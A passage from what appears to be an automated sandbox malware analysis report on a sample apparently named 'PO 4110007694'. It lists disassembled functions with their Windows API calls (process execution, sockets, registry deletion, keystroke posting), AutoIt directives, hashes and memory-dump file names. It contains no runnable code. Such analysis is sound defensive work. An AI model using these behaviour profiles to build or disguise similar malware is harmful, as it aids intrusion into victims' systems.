                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                    • String ID:
                                                                    • API String ID: 4072528602-0
                                                                    • Opcode ID: ed290c370ca3eeffe84c011cdda6ecd4d8fefc5625aaccf45e75308e8aa63f91
                                                                    • Instruction ID: 94ca613409c7a91fefeea44c95183d5ab380d3942bb4d7480c6dc14c9bb66deb
                                                                    • Opcode Fuzzy Hash: ed290c370ca3eeffe84c011cdda6ecd4d8fefc5625aaccf45e75308e8aa63f91
                                                                    • Instruction Fuzzy Hash: A0718C34600204FFDF209F65E998FBA7BB9EF09300F14415AFA65972A2C731AE51EB50
                                                                    Function 00C8F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C8F448
                                                                    • _memset.LIBCMT ref: 00C8F511
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00C8F556
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                      • Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9
                                                                    • GetProcessId.KERNEL32(00000000), ref: 00C8F5CD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C8F5FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                    • String ID: @
                                                                    • API String ID: 3522835683-2766056989
                                                                    • Opcode ID: 86c5eefd8b6fa2606b19a6729605239b8c1f35ef9c03bf101a92d0e666a065df
                                                                    • Instruction ID: be345055efb5fb890140dd9b7801efc3b2a839cf868b9d2d01ae84178658aea1
                                                                    • Opcode Fuzzy Hash: 86c5eefd8b6fa2606b19a6729605239b8c1f35ef9c03bf101a92d0e666a065df
                                                                    • Instruction Fuzzy Hash: D361BE71A006199FCB14EFA4C4919AEBBF4FF49314F14806DE855AB391CB30EE42DB94
                                                                    Function 00C70F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00C70F8C
                                                                    • GetKeyboardState.USER32(?), ref: 00C70FA1
                                                                    • SetKeyboardState.USER32(?), ref: 00C71002
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C71030
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C7104F
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C71095
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C710B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: b6235255fa92c67c1f65daeb39d4568c949b64a83fb0b10cd1a31e93afd81d5c
                                                                    • Instruction ID: 39283a9e82c56a8808e7a8ade612280ce40b1cb6e52d331219abe977f64721ba
                                                                    • Opcode Fuzzy Hash: b6235255fa92c67c1f65daeb39d4568c949b64a83fb0b10cd1a31e93afd81d5c
                                                                    • Instruction Fuzzy Hash: 8351F4605047D57EFB3646788C09BBABEA95B06304F0CC589E5EC898C3C2E8EED5D751
                                                                    Function 00C70D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(00000000), ref: 00C70DA5
                                                                    • GetKeyboardState.USER32(?), ref: 00C70DBA
                                                                    • SetKeyboardState.USER32(?), ref: 00C70E1B
                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C70E47
                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C70E64
                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C70EA8
                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C70EC9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: dff2e2c084fd735757367873e8dd13371759cbe69381bd28e6c43b6a8c5b9b96
                                                                    • Instruction ID: 4d1257bde44a601d1da64ff4f4565e7db2138ef6ee2b16668abd4c67b735e523
                                                                    • Opcode Fuzzy Hash: dff2e2c084fd735757367873e8dd13371759cbe69381bd28e6c43b6a8c5b9b96
                                                                    • Instruction Fuzzy Hash: C551D4A05447D5BDFB3287648C45B7ABFA96B06300F18C88DF1EC864C3D395AE98E750
                                                                    Function 00C755FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsncpy$LocalTime
                                                                    • String ID:
                                                                    • API String ID: 2945705084-0
                                                                    • Opcode ID: 92c03874f926b042757d524cd9cf0d48801f545a1882848549ab80ffb2854ed9
                                                                    • Instruction ID: 693b234e797d8a55856c5634a1edf2f235b61a9fa8c0936c9766de9d72353471
                                                                    • Opcode Fuzzy Hash: 92c03874f926b042757d524cd9cf0d48801f545a1882848549ab80ffb2854ed9
                                                                    • Instruction Fuzzy Hash: C841A475D2061476CB15EBB48C86ACFB3B89F04310F508966F519E3221FB34E356D7AA
                                                                    Function 00C73671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C73697,?), ref: 00C7468B
                                                                      • Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C73697,?), ref: 00C746A4
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00C736B7
                                                                    • _wcscmp.LIBCMT ref: 00C736D3
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00C736EB
                                                                    • _wcscat.LIBCMT ref: 00C73733
                                                                    • SHFileOperationW.SHELL32(?), ref: 00C7379F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 1377345388-1173974218
                                                                    • Opcode ID: 71fd4e04a2fb9a6ed638af5ccf381b53714660913aff1136384597b930cc2b41
                                                                    • Instruction ID: 0d9f67610b6ed8bde24fe0b4055bef6185da656cacecb82af0432503943d0caf
                                                                    • Opcode Fuzzy Hash: 71fd4e04a2fb9a6ed638af5ccf381b53714660913aff1136384597b930cc2b41
                                                                    • Instruction Fuzzy Hash: CF418E71108385AAC755EF64C841ADFB7E8EF89390F00492EB49AC3251EB34D789E752
                                                                    Function 00C97291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C972AA
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C97351
                                                                    • IsMenu.USER32(?), ref: 00C97369
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C973B1
                                                                    • DrawMenuBar.USER32 ref: 00C973C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                    • String ID: 0
                                                                    • API String ID: 3866635326-4108050209
                                                                    • Opcode ID: fa09a5bf199e4a9156f301a8893d90211ad780e83f6fb349f7355ce22833cee0
                                                                    • Instruction ID: b7f1d3ef21a6bac3b76e5b4fadf4fb6523504cb14701058be773a82484fb9a20
                                                                    • Opcode Fuzzy Hash: fa09a5bf199e4a9156f301a8893d90211ad780e83f6fb349f7355ce22833cee0
                                                                    • Instruction Fuzzy Hash: 2F411675A55208EFDF20DF50D888A9EBBB8FB05310F14862AFD1597260D730AE50EB50
                                                                    Function 00C90FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C90FD4
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C90FFE
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00C910B5
                                                                      • Part of subcall function 00C90FA5: RegCloseKey.ADVAPI32(?), ref: 00C9101B
                                                                      • Part of subcall function 00C90FA5: FreeLibrary.KERNEL32(?), ref: 00C9106D
                                                                      • Part of subcall function 00C90FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C91090
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C91058
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                    • String ID:
                                                                    • API String ID: 395352322-0
                                                                    • Opcode ID: bb0b47a0c2937602c7ebd0063f32249babb5a4b4c84d9ccbb4d836034f6dbc9f
                                                                    • Instruction ID: 299d30d8661cb0e6cc9f0331c195593baf1b0d79c9737f619410e2786ee646db
                                                                    • Opcode Fuzzy Hash: bb0b47a0c2937602c7ebd0063f32249babb5a4b4c84d9ccbb4d836034f6dbc9f
                                                                    • Instruction Fuzzy Hash: 75310C71901109BFDF159F90DC8EAFFB7BCEF08300F14116AE912E2151EA759F859AA0
                                                                    Function 00C962CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C962EC
                                                                    • GetWindowLongW.USER32(017B5A08,000000F0), ref: 00C9631F
                                                                    • GetWindowLongW.USER32(017B5A08,000000F0), ref: 00C96354
                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C96386
                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C963B0
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00C963C1
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C963DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 2178440468-0
                                                                    • Opcode ID: b9e0198513f6277791b929729005e9580074860a7c1695cbe83e38b1c4b85e53
                                                                    • Instruction ID: 1064cbef8cfb62fecf522721207b5a163cef01804cc4fad62ccda8c0794bd47f
                                                                    • Opcode Fuzzy Hash: b9e0198513f6277791b929729005e9580074860a7c1695cbe83e38b1c4b85e53
                                                                    • Instruction Fuzzy Hash: EE31EE30644250AFDB218F29DC89F5937E1BB4A724F1901AAF521DB2F2CB71A941AB51
                                                                    Function 00C6DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DB2E
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DB54
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00C6DB57
                                                                    • SysAllocString.OLEAUT32(?), ref: 00C6DB75
                                                                    • SysFreeString.OLEAUT32(?), ref: 00C6DB7E
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00C6DBA3
                                                                    • SysAllocString.OLEAUT32(?), ref: 00C6DBB1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: 8b8afbcacc3dcc883f523f5b1e9dc0b64399231b6bc34561da2e3016e2b6562c
                                                                    • Instruction ID: b558aefe60fad080c8f6e3b76a4bc524530c39d3e658a7fa0025557d92102f61
                                                                    • Opcode Fuzzy Hash: 8b8afbcacc3dcc883f523f5b1e9dc0b64399231b6bc34561da2e3016e2b6562c
                                                                    • Instruction Fuzzy Hash: 9C21C732B00219AFDF20DFA9DC88DBF73ACEB49360B11816AF915DB250DA70DD418764
                                                                    Function 00C86173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C87DB6
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C861C6
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C861D5
                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C8620E
                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00C86217
                                                                    • WSAGetLastError.WSOCK32 ref: 00C86221
                                                                    • closesocket.WSOCK32(00000000), ref: 00C8624A
                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C86263
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 910771015-0
                                                                    • Opcode ID: 0af96e42d9e2c5da7c09e0a6fd7698f95dbdc21b805ec063c0e70f25ed5fc290
                                                                    • Instruction ID: b2d599ba09da0174755bdc8610f80d94aee2eaf5c661fe0b50d373d475dedfa0
                                                                    • Opcode Fuzzy Hash: 0af96e42d9e2c5da7c09e0a6fd7698f95dbdc21b805ec063c0e70f25ed5fc290
                                                                    • Instruction Fuzzy Hash: E631C131600108AFEF10AF64CC89BBE77ACEF46728F044069FD15E7291DB70AD459BA5
                                                                    Function 00C6F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                    • API String ID: 1038674560-2734436370
                                                                    • Opcode ID: d94950b1e357ff6a7d785a597ae6e626c6387ed876d7dfebc43f52a99fead7f7
                                                                    • Instruction ID: 172847455c4f1d30ffe559b922a14bc6a092e481b05a63264df45f40774b117d
                                                                    • Opcode Fuzzy Hash: d94950b1e357ff6a7d785a597ae6e626c6387ed876d7dfebc43f52a99fead7f7
                                                                    • Instruction Fuzzy Hash: A52146B225412166D230BA34FC83FA773A8EF56344F10403DF8A686091EB519E83E2A5
                                                                    Function 00C6DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DC09
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DC2F
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00C6DC32
                                                                    • SysAllocString.OLEAUT32 ref: 00C6DC53
                                                                    • SysFreeString.OLEAUT32 ref: 00C6DC5C
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00C6DC76
                                                                    • SysAllocString.OLEAUT32(?), ref: 00C6DC84
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: dd25e93ea05fa3991c380abf8126e035b65167079943efa3cb73564049be1b69
                                                                    • Instruction ID: 804afc0b7ccdf04df50efaa897a1b8425b75fc66320e07b16de68ff30dd1ca93
                                                                    • Opcode Fuzzy Hash: dd25e93ea05fa3991c380abf8126e035b65167079943efa3cb73564049be1b69
                                                                    • Instruction Fuzzy Hash: 5C213235704209BFDB209FA8DCC8EAB77ECEB09360B108126F915CB261D670DD81CB64
                                                                    Function 00C975CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C11D73
                                                                      • Part of subcall function 00C11D35: GetStockObject.GDI32(00000011), ref: 00C11D87
                                                                      • Part of subcall function 00C11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C11D91
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C97632
                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C9763F
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C9764A
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C97659
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C97665
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 1025951953-3636473452
                                                                    • Opcode ID: dc6b2b39dc66280a3ed0fa4d5883ab9bb1e598f744074301e50852d613fe9df3
                                                                    • Instruction ID: a2d45d209e2ce3bd550f3e4f4615a28902c557cd80310e7e33732b91f5cfef11
                                                                    • Opcode Fuzzy Hash: dc6b2b39dc66280a3ed0fa4d5883ab9bb1e598f744074301e50852d613fe9df3
                                                                    • Instruction Fuzzy Hash: 5C11B6B1110219BFEF119F64CC85EEB7F6DEF08798F114115BA04A2050C6729C21DBA4
                                                                    Function 00C39AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __init_pointers.LIBCMT ref: 00C39AE6
                                                                      • Part of subcall function 00C33187: EncodePointer.KERNEL32(00000000), ref: 00C3318A
                                                                      • Part of subcall function 00C33187: __initp_misc_winsig.LIBCMT ref: 00C331A5
                                                                      • Part of subcall function 00C33187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C39EA0
